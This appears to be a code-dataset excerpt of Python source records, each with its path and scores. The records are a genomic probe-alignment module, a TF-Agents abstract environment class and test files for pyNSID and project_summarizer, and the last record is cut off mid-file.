Returns a tuple: (matching bases, total positions).
The minimap2 hit must have the extended cigar string, not the 'normal'
cigar string."""
if map_hit.NM == 0:
l = self.allele_end - self.allele_start + 1
return l, l
# If there are mismatches, then we can use the extended cigar string to
# work out how many of those mismatches are in the allele.
# Example cigar to remind which way round I and D are:
# read: AGT--TGATCAAGTAC
# ref: AGTGATGATC----AC
# cigar: 3M2D5M4I2M
probe_pos = map_hit.q_st
total_positions = 0
matches = 0
if map_hit.strand == -1:
map_hit.cigar.reverse()
for length, operator in map_hit.cigar:
if probe_pos > self.allele_end:
break
if operator == 7 or operator == 8: # 7,8 are "=","X" == match/mismatch
for i in range(length):
if self.allele_start <= probe_pos <= self.allele_end:
if operator == 7:
matches += 1
total_positions += 1
probe_pos += 1
if probe_pos > self.allele_end:
break
elif operator == 1: # 1 = I = insertion
if self.allele_start <= probe_pos <= self.allele_end:
total_positions += length
probe_pos += length
elif operator == 2: # 2 = D = deletion
if self.allele_start <= probe_pos <= self.allele_end:
total_positions += length
else:
raise RuntimeError(
f"Unexpected cigar operator number {operator} with length {length} from cigar"
)
if map_hit.strand == -1:
map_hit.cigar.reverse()
return matches, total_positions
def padded_probe_or_ref_seq(self, map_hit, ref_seq=None, ref_mask=None):
"""Returns a tuple: (padded seq string, mask list of bools).
padded seq string is the padded probe seq inferred from map_hit, or
if ref_seq provided then the padded ref seq matching the probe.
If ref_mask is given, should be a set of positions in the mask.
The returned mask list of bools is same length as the returned padded
seq string, and has True or False for whether each position is in the mask"""
# Cigar operators:
# 1 I Insertion in query (pad in ref)
# 2 D Deletion in query (pad in query)
# 7 = Match
# 8 X Mismatch
if map_hit.strand == -1:
q_st = len(self.seq) - map_hit.q_en
else:
q_st = map_hit.q_st
padded_seq = []
padded_mask = []
if ref_seq is None:
assert ref_mask is None
ref_seq = self.seq
pad_operators = {2}
non_pad_operators = {1, 7, 8}
if map_hit.strand == -1:
ref_seq = pyfastaq.sequences.Fasta("probe", self.seq)
ref_seq.revcomp()
position = q_st
else:
pad_operators = {1}
non_pad_operators = {2, 7, 8}
position = map_hit.r_st
for operator_length, operator_type in map_hit.cigar:
if operator_type in pad_operators:
padded_seq.append("-" * operator_length)
if ref_mask is not None:
padded_mask.extend([False] * operator_length)
elif operator_type in non_pad_operators:
padded_seq.append(ref_seq[position : position + operator_length])
if ref_mask is not None:
for i in range(position, position + operator_length):
padded_mask.append(i in ref_mask)
position += operator_length
else:
raise RuntimeError(
f"Unexpected cigar operator number {operator_type} with length {operator_length} from cigar"
)
if map_hit.strand == -1:
padded_seq.extend(["N"] * map_hit.q_st)
padded_seq = pyfastaq.sequences.Fasta("seq", "".join(padded_seq))
padded_seq.revcomp()
padded_seq = padded_seq.seq
if ref_mask is not None:
padded_mask.extend([False] * map_hit.q_st)
padded_mask.reverse()
else:
padded_seq = "".join(["N"] * map_hit.q_st + padded_seq)
if ref_mask is not None:
padded_mask = [False] * map_hit.q_st + padded_mask
if ref_mask is None:
padded_mask = [False] * len(padded_seq)
assert len(padded_seq) == len(padded_mask)
return padded_seq, padded_mask
def padded_seq_allele_start_end_coords(self, padded_seq):
position = 0
allele_start = None
for index, base in enumerate(padded_seq):
if base != "-":
if position == self.allele_start:
allele_start = index
if position == self.allele_end:
return allele_start, index
position += 1
return None, None
def edit_distance_vs_ref(self, map_hit, ref_seq, ref_mask=None):
padded_probe_seq, _ = self.padded_probe_or_ref_seq(map_hit)
padded_ref_seq, padded_ref_mask = self.padded_probe_or_ref_seq(
map_hit, ref_seq=ref_seq, ref_mask=ref_mask
)
start, end = self.padded_seq_allele_start_end_coords(padded_probe_seq)
if start == None:
return -1, False
probe_allele = padded_probe_seq[start : end + 1]
ref_allele = padded_ref_seq[start : end + 1]
if ref_mask is None:
in_mask = False
else:
in_mask = any(padded_ref_mask[start : end + 1])
return (
edit_distance.edit_distance_from_aln_strings(probe_allele, ref_allele),
in_mask,
) | varifier/probe.py | import pyfastaq
from varifier import edit_distance
class Probe:
def __init__(self, seq, allele_start, allele_end):
self.seq = seq
self.allele_start = allele_start
self.allele_end = allele_end
def __str__(self):
return f"{self.seq} {self.allele_start} {self.allele_end}"
def __eq__(self, other):
return type(other) is type(self) and self.__dict__ == other.__dict__
def allele_seq(self):
return self.seq[self.allele_start : self.allele_end + 1]
def map_hit_includes_allele(self, map_hit):
if map_hit.strand == -1:
start = len(self.seq) - map_hit.q_en
end = len(self.seq) - map_hit.q_st
else:
start = map_hit.q_st
end = map_hit.q_en
return start < self.allele_start and self.allele_end < end
def allele_match_counts(self, map_hit):
"""Given a mappy minimap2 hit, works out how many positions in the
alignment between the allele and the reference match.
Returns a tuple: (matching bases, total positions).
The minimap2 hit must have the extended cigar string, not the 'normal'
cigar string."""
if map_hit.NM == 0:
l = self.allele_end - self.allele_start + 1
return l, l
# If there are mismatches, then we can use the extended cigar string to
# work out how many of those mismatches are in the allele.
# Example cigar to remind which way round I and D are:
# read: AGT--TGATCAAGTAC
# ref: AGTGATGATC----AC
# cigar: 3M2D5M4I2M
probe_pos = map_hit.q_st
total_positions = 0
matches = 0
if map_hit.strand == -1:
map_hit.cigar.reverse()
for length, operator in map_hit.cigar:
if probe_pos > self.allele_end:
break
if operator == 7 or operator == 8: # 7,8 are "=","X" == match/mismatch
for i in range(length):
if self.allele_start <= probe_pos <= self.allele_end:
if operator == 7:
matches += 1
total_positions += 1
probe_pos += 1
if probe_pos > self.allele_end:
break
elif operator == 1: # 1 = I = insertion
if self.allele_start <= probe_pos <= self.allele_end:
total_positions += length
probe_pos += length
elif operator == 2: # 2 = D = deletion
if self.allele_start <= probe_pos <= self.allele_end:
total_positions += length
else:
raise RuntimeError(
f"Unexpected cigar operator number {operator} with length {length} from cigar"
)
if map_hit.strand == -1:
map_hit.cigar.reverse()
return matches, total_positions
def padded_probe_or_ref_seq(self, map_hit, ref_seq=None, ref_mask=None):
"""Returns a tuple: (padded seq string, mask list of bools).
padded seq string is the padded probe seq inferred from map_hit, or
if ref_seq provided then the padded ref seq matching the probe.
If ref_mask is given, should be a set of positions in the mask.
The returned mask list of bools is same length as the returned padded
seq string, and has True or False for whether each position is in the mask"""
# Cigar operators:
# 1 I Insertion in query (pad in ref)
# 2 D Deletion in query (pad in query)
# 7 = Match
# 8 X Mismatch
if map_hit.strand == -1:
q_st = len(self.seq) - map_hit.q_en
else:
q_st = map_hit.q_st
padded_seq = []
padded_mask = []
if ref_seq is None:
assert ref_mask is None
ref_seq = self.seq
pad_operators = {2}
non_pad_operators = {1, 7, 8}
if map_hit.strand == -1:
ref_seq = pyfastaq.sequences.Fasta("probe", self.seq)
ref_seq.revcomp()
position = q_st
else:
pad_operators = {1}
non_pad_operators = {2, 7, 8}
position = map_hit.r_st
for operator_length, operator_type in map_hit.cigar:
if operator_type in pad_operators:
padded_seq.append("-" * operator_length)
if ref_mask is not None:
padded_mask.extend([False] * operator_length)
elif operator_type in non_pad_operators:
padded_seq.append(ref_seq[position : position + operator_length])
if ref_mask is not None:
for i in range(position, position + operator_length):
padded_mask.append(i in ref_mask)
position += operator_length
else:
raise RuntimeError(
f"Unexpected cigar operator number {operator_type} with length {operator_length} from cigar"
)
if map_hit.strand == -1:
padded_seq.extend(["N"] * map_hit.q_st)
padded_seq = pyfastaq.sequences.Fasta("seq", "".join(padded_seq))
padded_seq.revcomp()
padded_seq = padded_seq.seq
if ref_mask is not None:
padded_mask.extend([False] * map_hit.q_st)
padded_mask.reverse()
else:
padded_seq = "".join(["N"] * map_hit.q_st + padded_seq)
if ref_mask is not None:
padded_mask = [False] * map_hit.q_st + padded_mask
if ref_mask is None:
padded_mask = [False] * len(padded_seq)
assert len(padded_seq) == len(padded_mask)
return padded_seq, padded_mask
def padded_seq_allele_start_end_coords(self, padded_seq):
position = 0
allele_start = None
for index, base in enumerate(padded_seq):
if base != "-":
if position == self.allele_start:
allele_start = index
if position == self.allele_end:
return allele_start, index
position += 1
return None, None
def edit_distance_vs_ref(self, map_hit, ref_seq, ref_mask=None):
padded_probe_seq, _ = self.padded_probe_or_ref_seq(map_hit)
padded_ref_seq, padded_ref_mask = self.padded_probe_or_ref_seq(
map_hit, ref_seq=ref_seq, ref_mask=ref_mask
)
start, end = self.padded_seq_allele_start_end_coords(padded_probe_seq)
if start == None:
return -1, False
probe_allele = padded_probe_seq[start : end + 1]
ref_allele = padded_ref_seq[start : end + 1]
if ref_mask is None:
in_mask = False
else:
in_mask = any(padded_ref_mask[start : end + 1])
return (
edit_distance.edit_distance_from_aln_strings(probe_allele, ref_allele),
in_mask,
) | 0.695855 | 0.267199 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class Base(object):
"""Abstract base class for TF RL environments.
The `current_time_step()` method returns current `time_step`, resetting the
environment if necessary.
The `step(action)` method applies the action and returns the new `time_step`.
This method will also reset the environment if needed and ignore the action in
that case.
The `reset()` method returns `time_step` that results from an environment
reset and is guaranteed to have step_type=ts.FIRST
The `reset()` is only needed for explicit resets, in general the Environment
will reset automatically when needed, for example, when no episode was started
or when stepped after the end of the episode was reached
(i.e. step_type=ts.LAST).
Example for collecting an episode in Eager mode:
tf_env = TFEnvironment()
# reset() creates the initial time_step and resets the Environment.
time_step = tf_env.reset()
while not time_step.is_last():
action_step = policy.action(time_step)
time_step = tf_env.step(action_step.action)
Example of simple use in Graph Mode:
tf_env = TFEnvironment()
# current_time_step() creates the initial TimeStep.
time_step = tf_env.current_time_step()
action_step = policy.action(time_step)
# It applies the action and returns the new TimeStep.
next_time_step = tf_env.step(action_step.action)
sess.run([time_step, action_step, next_time_step])
Example with explicit resets in Graph-Mode:
reset_op = tf_env.reset()
time_step = tf_env.current_time_step()
action_step = policy.action(time_step)
# It applies the action and returns the new TimeStep.
next_time_step = tf_env.step(action_step.action)
# The Environment will initialize before starting.
sess.run([time_step, action_step, next_time_step])
# This will force reset the Environment.
sess.run(reset_op)
# This will apply a new action in the Environment.
sess.run([time_step, action_step, next_time_step])
Example of random actions in Graph mode:
tf_env = TFEnvironment()
# The action needs to depend on time_step using control_dependencies.
time_step = tf_env.current_time_step()
with tf.control_dependencies([time_step.step_type]):
action = tensor_spec.sample_bounded_spec(tf_env.action_spec())
next_time_step = tf_env.step(action)
sess.run([timestep, action, next_timestep])
Example of collecting full episodes with a while_loop:
tf_env = TFEnvironment()
# reset() creates the initial time_step
time_step = tf_env.reset()
c = lambda t: tf.logical_not(t.is_last())
body = lambda t: [tf_env.step(t.observation)]
final_time_step = tf.while_loop(c, body, [time_step])
sess.run(final_time_step)
"""
def __init__(self, time_step_spec=None, action_spec=None, batch_size=1):
"""Meant to be called by subclass constructors.
Args:
time_step_spec: A `TimeStep` namedtuple containing `TensorSpec`s
defining the tensors returned by
`step()` (step_type, reward, discount, and observation).
action_spec: A nest of BoundedTensorSpec representing the actions of the
environment.
batch_size: The batch size expected for the actions and observations.
"""
self._time_step_spec = time_step_spec
self._action_spec = action_spec
self._batch_size = batch_size
@abc.abstractmethod
def current_time_step(self):
"""Returns the current `TimeStep`.
Returns:
A `TimeStep` namedtuple containing:
step_type: A `StepType` value.
reward: Reward at this timestep.
discount: A discount in the range [0, 1].
observation: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `observation_spec()`.
"""
@abc.abstractmethod
def reset(self):
"""Resets the environment and returns the current_time_step.
Returns:
A `TimeStep` namedtuple containing:
step_type: A `StepType` value.
reward: Reward at this timestep.
discount: A discount in the range [0, 1].
observation: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `observation_spec()`.
"""
@abc.abstractmethod
def step(self, action):
"""Steps the environment according to the action.
If the environment returned a `TimeStep` with `StepType.LAST` at the
previous step, this call to `step` will start a new sequence and `action`
will be ignored.
This method will also start a new sequence if called after the environment
has been constructed and `reset` has not been called. In this case
`action` will be ignored.
Expected sequences look like:
time_step -> action -> next_time_step
The action should depend on the previous time_step for correctness.
Args:
action: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `action_spec()`.
Returns:
A `TimeStep` namedtuple containing:
step_type: A `StepType` value.
reward: Reward at this timestep.
discount: A discount in the range [0, 1].
observation: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `observation_spec()`.
"""
def render(self):
"""Renders a frame from the environment.
Raises:
NotImplementedError: If the environment does not support rendering.
"""
raise NotImplementedError('No rendering support.')
def time_step_spec(self):
"""Describes the `TimeStep` tensors returned by `step()`.
Returns:
A `TimeStep` namedtuple containing `TensorSpec`s defining the tensors
returned by `step()` (step_type, reward, discount, and observation).
"""
return self._time_step_spec
def action_spec(self):
"""Describes the TensorSpecs of the Tensors expected by `step(action)`.
`action` can be a single Tensor, or a nested dict, list or tuple of
Tensors.
Returns:
An single TensorSpec, or a nested dict, list or tuple of
`TensorSpec` objects, which describe the shape and
dtype of each Tensor expected by `step()`.
"""
return self._action_spec
def observation_spec(self):
"""Defines the TensorSpec of observations provided by the environment.
Returns:
Same structure as returned by `time_step_spec().observation`.
"""
return self.time_step_spec().observation
@property
def batched(self):
return True
@property
def batch_size(self):
return self._batch_size | tf_agents/environments/tf_environment.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class Base(object):
"""Abstract base class for TF RL environments.
The `current_time_step()` method returns current `time_step`, resetting the
environment if necessary.
The `step(action)` method applies the action and returns the new `time_step`.
This method will also reset the environment if needed and ignore the action in
that case.
The `reset()` method returns `time_step` that results from an environment
reset and is guaranteed to have step_type=ts.FIRST
The `reset()` is only needed for explicit resets, in general the Environment
will reset automatically when needed, for example, when no episode was started
or when stepped after the end of the episode was reached
(i.e. step_type=ts.LAST).
Example for collecting an episode in Eager mode:
tf_env = TFEnvironment()
# reset() creates the initial time_step and resets the Environment.
time_step = tf_env.reset()
while not time_step.is_last():
action_step = policy.action(time_step)
time_step = tf_env.step(action_step.action)
Example of simple use in Graph Mode:
tf_env = TFEnvironment()
# current_time_step() creates the initial TimeStep.
time_step = tf_env.current_time_step()
action_step = policy.action(time_step)
# It applies the action and returns the new TimeStep.
next_time_step = tf_env.step(action_step.action)
sess.run([time_step, action_step, next_time_step])
Example with explicit resets in Graph-Mode:
reset_op = tf_env.reset()
time_step = tf_env.current_time_step()
action_step = policy.action(time_step)
# It applies the action and returns the new TimeStep.
next_time_step = tf_env.step(action_step.action)
# The Environment will initialize before starting.
sess.run([time_step, action_step, next_time_step])
# This will force reset the Environment.
sess.run(reset_op)
# This will apply a new action in the Environment.
sess.run([time_step, action_step, next_time_step])
Example of random actions in Graph mode:
tf_env = TFEnvironment()
# The action needs to depend on time_step using control_dependencies.
time_step = tf_env.current_time_step()
with tf.control_dependencies([time_step.step_type]):
action = tensor_spec.sample_bounded_spec(tf_env.action_spec())
next_time_step = tf_env.step(action)
sess.run([timestep, action, next_timestep])
Example of collecting full episodes with a while_loop:
tf_env = TFEnvironment()
# reset() creates the initial time_step
time_step = tf_env.reset()
c = lambda t: tf.logical_not(t.is_last())
body = lambda t: [tf_env.step(t.observation)]
final_time_step = tf.while_loop(c, body, [time_step])
sess.run(final_time_step)
"""
def __init__(self, time_step_spec=None, action_spec=None, batch_size=1):
"""Meant to be called by subclass constructors.
Args:
time_step_spec: A `TimeStep` namedtuple containing `TensorSpec`s
defining the tensors returned by
`step()` (step_type, reward, discount, and observation).
action_spec: A nest of BoundedTensorSpec representing the actions of the
environment.
batch_size: The batch size expected for the actions and observations.
"""
self._time_step_spec = time_step_spec
self._action_spec = action_spec
self._batch_size = batch_size
@abc.abstractmethod
def current_time_step(self):
"""Returns the current `TimeStep`.
Returns:
A `TimeStep` namedtuple containing:
step_type: A `StepType` value.
reward: Reward at this timestep.
discount: A discount in the range [0, 1].
observation: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `observation_spec()`.
"""
@abc.abstractmethod
def reset(self):
"""Resets the environment and returns the current_time_step.
Returns:
A `TimeStep` namedtuple containing:
step_type: A `StepType` value.
reward: Reward at this timestep.
discount: A discount in the range [0, 1].
observation: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `observation_spec()`.
"""
@abc.abstractmethod
def step(self, action):
"""Steps the environment according to the action.
If the environment returned a `TimeStep` with `StepType.LAST` at the
previous step, this call to `step` will start a new sequence and `action`
will be ignored.
This method will also start a new sequence if called after the environment
has been constructed and `reset` has not been called. In this case
`action` will be ignored.
Expected sequences look like:
time_step -> action -> next_time_step
The action should depend on the previous time_step for correctness.
Args:
action: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `action_spec()`.
Returns:
A `TimeStep` namedtuple containing:
step_type: A `StepType` value.
reward: Reward at this timestep.
discount: A discount in the range [0, 1].
observation: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `observation_spec()`.
"""
def render(self):
"""Renders a frame from the environment.
Raises:
NotImplementedError: If the environment does not support rendering.
"""
raise NotImplementedError('No rendering support.')
def time_step_spec(self):
"""Describes the `TimeStep` tensors returned by `step()`.
Returns:
A `TimeStep` namedtuple containing `TensorSpec`s defining the tensors
returned by `step()` (step_type, reward, discount, and observation).
"""
return self._time_step_spec
def action_spec(self):
"""Describes the TensorSpecs of the Tensors expected by `step(action)`.
`action` can be a single Tensor, or a nested dict, list or tuple of
Tensors.
Returns:
An single TensorSpec, or a nested dict, list or tuple of
`TensorSpec` objects, which describe the shape and
dtype of each Tensor expected by `step()`.
"""
return self._action_spec
def observation_spec(self):
"""Defines the TensorSpec of observations provided by the environment.
Returns:
Same structure as returned by `time_step_spec().observation`.
"""
return self.time_step_spec().observation
@property
def batched(self):
return True
@property
def batch_size(self):
return self._batch_size | 0.946448 | 0.572842 |
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import sys
import unittest
import tempfile
from typing import Type, Tuple
import h5py
import numpy as np
from sidpy import Dataset, Dimension
sys.path.append("../pyNSID/")
from pyNSID.io.hdf_io import write_nsid_dataset
from pyNSID.io.hdf_utils import find_dataset
from pyNSID.io.nsi_reader import NSIDReader
def create_h5group(h5f_name: str, h5g_name: str) -> Type[h5py.Group]:
mode = 'r+' if os.path.exists(h5f_name) else 'w'
h5_f = h5py.File(h5f_name, mode)
h5_group = h5_f.create_group(h5g_name)
return h5_group
def write_dummy_dset(hf_group: Type[h5py.Group], dims: Tuple[int],
main_name: str, **kwargs) -> None:
dset = Dataset.from_array(
np.random.random([*dims]), name="new")
dnames = kwargs.get("dnames", np.arange(len(dims)))
for i, d in enumerate(dims):
dset.set_dimension(i, Dimension(np.arange(d), str(dnames[i])))
write_nsid_dataset(
dset, hf_group, main_data_name=main_name)
def get_dset(hf_path: str, dset_name: str) -> Type[h5py.Dataset]:
hf = h5py.File(hf_path, 'r')
dset = find_dataset(hf, dset_name)[0]
return dset
class TestNsidReaderNoDatasets(unittest.TestCase):
def test_not_hdf5_file(self):
pass
def setUp(self) -> None:
pass
def tearDown(self) -> None:
pass
def test_can_read_fails(self):
pass
def test_read_returns_nothing(self):
pass
def test_read_all_no_parent(self):
pass
class TestNsidReaderSingleDataset(unittest.TestCase):
def setUp(self) -> None:
pass
def tearDown(self) -> None:
pass
def test_can_read_passes(self):
pass
def test_read_no_object_specified(self):
pass
def test_read_invalid_dtype_for_object(self):
pass
def test_read_object_in_different_file(self):
pass
def test_read_correct_main_dset(self):
pass
def test_read_group_containing_main_dset(self):
pass
def test_read_all_no_parent(self):
pass
def test_read_all_parent_specified(self):
pass
def test_read_invalid_dtype_for_parent(self):
pass
def test_read_parent_in_different_file(self):
pass
class TestNsidReaderMultipleDatasets(unittest.TestCase):
def setUp(self) -> None:
pass
def tearDown(self) -> None:
pass
def test_can_read_passes(self):
pass
def test_read_no_object_specified(self):
pass
def test_read_correct_main_dset(self):
pass
def test_read_group_containing_main_dset(self):
pass
def test_read_all_no_parent(self):
pass
def test_read_all_parent_specified(self):
pass
class TestOldTests(unittest.TestCase):
def test_can_read(self) -> None:
hf_name = "test.hdf5"
self.tearDown()
h5group_1 = create_h5group(hf_name, "group1")
self.assertFalse(NSIDReader(hf_name).can_read())
h5group_2 = create_h5group(hf_name, "group2")
write_dummy_dset(h5group_2, (10, 10, 5), "dset")
self.assertTrue(NSIDReader(hf_name).can_read())
def test_read_single(self) -> None:
hf_name = "test.hdf5"
self.tearDown()
h5group = create_h5group(hf_name, "group")
write_dummy_dset(h5group, (10, 10, 5), "dset")
dset = get_dset(hf_name, "dset")
reader = NSIDReader(hf_name)
d1 = reader.read(h5group)
d2 = reader.read()
self.assertTrue(isinstance(d1[0], Dataset))
self.assertTrue(isinstance(d2, list))
self.assertTrue(isinstance(d2[0], Dataset))
def test_read_multi(self) -> None:
hf_name = "test.hdf5"
self.tearDown()
h5group = create_h5group(hf_name, "group")
for i in range(3):
write_dummy_dset(
h5group, (10, 10, 5+i),
"dset{}".format(i),
dnames=np.arange(3*i, 3*(i+1)))
reader = NSIDReader(hf_name)
d_all = reader.read()
self.assertTrue(isinstance(d_all, list))
self.assertEqual(len(d_all), 3)
self.assertEqual(sum([1 for d in d_all if isinstance(d, Dataset)]), 3)
for i in range(3):
dset_i = get_dset(hf_name, "dset{}".format(i))
d_i = reader.read(dset_i)
self.assertEqual(d_i.shape[-1], 5+i)
def test_read_all(self) -> None:
hf_name = "test.hdf5"
self.tearDown()
h5group_1 = create_h5group(hf_name, "group1")
h5group_2 = create_h5group(hf_name, "group2")
# Write multiple datasets to the first group
for i in range(5):
write_dummy_dset(
h5group_1, (10, 10, 5),
"dset{}".format(i),
dnames=np.arange(3*i, 3*(i+1)))
# write a single dataset to the second group
write_dummy_dset(h5group_2, (7, 7, 10), "dset")
# initialize and test reader
reader = NSIDReader(hf_name)
d_all = reader.read_all(recursive=True)
self.assertEqual(len(d_all), 6)
self.assertEqual(sum([1 for d in d_all if isinstance(d, Dataset)]), 6)
d = reader.read_all(recursive=True, parent=h5group_2)
self.assertEqual(len(d), 6)
self.assertTrue(isinstance(d[0], Dataset))
def tearDown(self, fname: str = 'test.hdf5') -> None:
if os.path.exists(fname):
os.remove(fname) | tests/io/test_nsi_reader.py | from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import sys
import unittest
import tempfile
from typing import Type, Tuple
import h5py
import numpy as np
from sidpy import Dataset, Dimension
sys.path.append("../pyNSID/")
from pyNSID.io.hdf_io import write_nsid_dataset
from pyNSID.io.hdf_utils import find_dataset
from pyNSID.io.nsi_reader import NSIDReader
def create_h5group(h5f_name: str, h5g_name: str) -> Type[h5py.Group]:
mode = 'r+' if os.path.exists(h5f_name) else 'w'
h5_f = h5py.File(h5f_name, mode)
h5_group = h5_f.create_group(h5g_name)
return h5_group
def write_dummy_dset(hf_group: Type[h5py.Group], dims: Tuple[int],
main_name: str, **kwargs) -> None:
dset = Dataset.from_array(
np.random.random([*dims]), name="new")
dnames = kwargs.get("dnames", np.arange(len(dims)))
for i, d in enumerate(dims):
dset.set_dimension(i, Dimension(np.arange(d), str(dnames[i])))
write_nsid_dataset(
dset, hf_group, main_data_name=main_name)
def get_dset(hf_path: str, dset_name: str) -> Type[h5py.Dataset]:
hf = h5py.File(hf_path, 'r')
dset = find_dataset(hf, dset_name)[0]
return dset
class TestNsidReaderNoDatasets(unittest.TestCase):
def test_not_hdf5_file(self):
pass
def setUp(self) -> None:
pass
def tearDown(self) -> None:
pass
def test_can_read_fails(self):
pass
def test_read_returns_nothing(self):
pass
def test_read_all_no_parent(self):
pass
class TestNsidReaderSingleDataset(unittest.TestCase):
def setUp(self) -> None:
pass
def tearDown(self) -> None:
pass
def test_can_read_passes(self):
pass
def test_read_no_object_specified(self):
pass
def test_read_invalid_dtype_for_object(self):
pass
def test_read_object_in_different_file(self):
pass
def test_read_correct_main_dset(self):
pass
def test_read_group_containing_main_dset(self):
pass
def test_read_all_no_parent(self):
pass
def test_read_all_parent_specified(self):
pass
def test_read_invalid_dtype_for_parent(self):
pass
def test_read_parent_in_different_file(self):
pass
class TestNsidReaderMultipleDatasets(unittest.TestCase):
def setUp(self) -> None:
pass
def tearDown(self) -> None:
pass
def test_can_read_passes(self):
pass
def test_read_no_object_specified(self):
pass
def test_read_correct_main_dset(self):
pass
def test_read_group_containing_main_dset(self):
pass
def test_read_all_no_parent(self):
pass
def test_read_all_parent_specified(self):
pass
class TestOldTests(unittest.TestCase):
def test_can_read(self) -> None:
hf_name = "test.hdf5"
self.tearDown()
h5group_1 = create_h5group(hf_name, "group1")
self.assertFalse(NSIDReader(hf_name).can_read())
h5group_2 = create_h5group(hf_name, "group2")
write_dummy_dset(h5group_2, (10, 10, 5), "dset")
self.assertTrue(NSIDReader(hf_name).can_read())
def test_read_single(self) -> None:
hf_name = "test.hdf5"
self.tearDown()
h5group = create_h5group(hf_name, "group")
write_dummy_dset(h5group, (10, 10, 5), "dset")
dset = get_dset(hf_name, "dset")
reader = NSIDReader(hf_name)
d1 = reader.read(h5group)
d2 = reader.read()
self.assertTrue(isinstance(d1[0], Dataset))
self.assertTrue(isinstance(d2, list))
self.assertTrue(isinstance(d2[0], Dataset))
def test_read_multi(self) -> None:
hf_name = "test.hdf5"
self.tearDown()
h5group = create_h5group(hf_name, "group")
for i in range(3):
write_dummy_dset(
h5group, (10, 10, 5+i),
"dset{}".format(i),
dnames=np.arange(3*i, 3*(i+1)))
reader = NSIDReader(hf_name)
d_all = reader.read()
self.assertTrue(isinstance(d_all, list))
self.assertEqual(len(d_all), 3)
self.assertEqual(sum([1 for d in d_all if isinstance(d, Dataset)]), 3)
for i in range(3):
dset_i = get_dset(hf_name, "dset{}".format(i))
d_i = reader.read(dset_i)
self.assertEqual(d_i.shape[-1], 5+i)
def test_read_all(self) -> None:
hf_name = "test.hdf5"
self.tearDown()
h5group_1 = create_h5group(hf_name, "group1")
h5group_2 = create_h5group(hf_name, "group2")
# Write multiple datasets to the first group
for i in range(5):
write_dummy_dset(
h5group_1, (10, 10, 5),
"dset{}".format(i),
dnames=np.arange(3*i, 3*(i+1)))
# write a single dataset to the second group
write_dummy_dset(h5group_2, (7, 7, 10), "dset")
# initialize and test reader
reader = NSIDReader(hf_name)
d_all = reader.read_all(recursive=True)
self.assertEqual(len(d_all), 6)
self.assertEqual(sum([1 for d in d_all if isinstance(d, Dataset)]), 6)
d = reader.read_all(recursive=True, parent=h5group_2)
self.assertEqual(len(d), 6)
self.assertTrue(isinstance(d[0], Dataset))
def tearDown(self, fname: str = 'test.hdf5') -> None:
if os.path.exists(fname):
os.remove(fname) | 0.541894 | 0.299726 |
import os
import sys
import tempfile
from test.pytest_execute import InProcessExecution
from project_summarizer.__main__ import main
from project_summarizer.main import ProjectSummarizer
JUNIT_COMMAND_LINE_FLAG = "--junit"
COBERTURA_COMMAND_LINE_FLAG = "--cobertura"
PUBLISH_COMMAND_LINE_FLAG = "--publish"
ONLY_CHANGES_COMMAND_LINE_FLAG = "--only-changes"
REPORT_DIRECTORY = "report"
PUBLISH_DIRECTORY = "publish"
JUNIT_RESULTS_FILE_NAME = "tests.xml"
RESULTS_SUMMARY_FILE_NAME = "test-results.json"
COVERAGE_SUMMARY_FILE_NAME = "coverage.json"
__COBERTURA_COVERAGE_FILE_NAME = "coverage.xml"
__COBERTURA_NON_WINDOWS_COVERAGE_FILE_NAME = "coverage-non-windows.xml"
def get_coverage_file_name():
"""
Get the coverage file for the specific operating system class.
This is needed as Windows uses a different file name hierarchy than the others.
"""
if sys.platform.startswith("win"):
return __COBERTURA_COVERAGE_FILE_NAME
return __COBERTURA_NON_WINDOWS_COVERAGE_FILE_NAME
class MainlineExecutor(InProcessExecution):
"""
Class to provide for a local instance of a InProcessExecution class.
"""
def __init__(self, use_module=False, use_main=False):
super().__init__()
self.__use_main = use_main
self.__entry_point = "__main.py__" if use_module else "main.py"
resource_directory = os.path.join(os.getcwd(), "test", "resources")
assert os.path.exists(resource_directory)
assert os.path.isdir(resource_directory)
self.resource_directory = resource_directory
def execute_main(self):
if self.__use_main:
main()
else:
ProjectSummarizer().main()
def get_main_name(self):
return self.__entry_point
def test_get_summarizer_version():
"""
Make sure that we can get information about the version of the summarizer.
"""
# Arrange
executor = MainlineExecutor()
suppplied_arguments = ["--version"]
expected_output = """\
main.py 0.5.0
"""
expected_error = ""
expected_return_code = 0
# Act
execute_results = executor.invoke_main(arguments=suppplied_arguments, cwd=None)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
# pylint: disable=consider-using-with
def setup_directories(
create_report_directory=True,
create_publish_directory=False,
temporary_work_directory=None,
):
"""
Setup a temporary directory, a report directory under it (created if necessary),
and the publish directory (not created by default if necessary).
"""
if not temporary_work_directory:
temporary_work_directory = tempfile.TemporaryDirectory()
report_directory = os.path.join(temporary_work_directory.name, "report")
if create_report_directory:
os.makedirs(report_directory)
publish_directory = os.path.join(temporary_work_directory.name, "publish")
if create_publish_directory:
os.makedirs(publish_directory)
return temporary_work_directory, report_directory, publish_directory
# pylint: enable=consider-using-with | test/test_scenarios.py | import os
import sys
import tempfile
from test.pytest_execute import InProcessExecution
from project_summarizer.__main__ import main
from project_summarizer.main import ProjectSummarizer
JUNIT_COMMAND_LINE_FLAG = "--junit"
COBERTURA_COMMAND_LINE_FLAG = "--cobertura"
PUBLISH_COMMAND_LINE_FLAG = "--publish"
ONLY_CHANGES_COMMAND_LINE_FLAG = "--only-changes"
REPORT_DIRECTORY = "report"
PUBLISH_DIRECTORY = "publish"
JUNIT_RESULTS_FILE_NAME = "tests.xml"
RESULTS_SUMMARY_FILE_NAME = "test-results.json"
COVERAGE_SUMMARY_FILE_NAME = "coverage.json"
__COBERTURA_COVERAGE_FILE_NAME = "coverage.xml"
__COBERTURA_NON_WINDOWS_COVERAGE_FILE_NAME = "coverage-non-windows.xml"
def get_coverage_file_name():
"""
Get the coverage file for the specific operating system class.
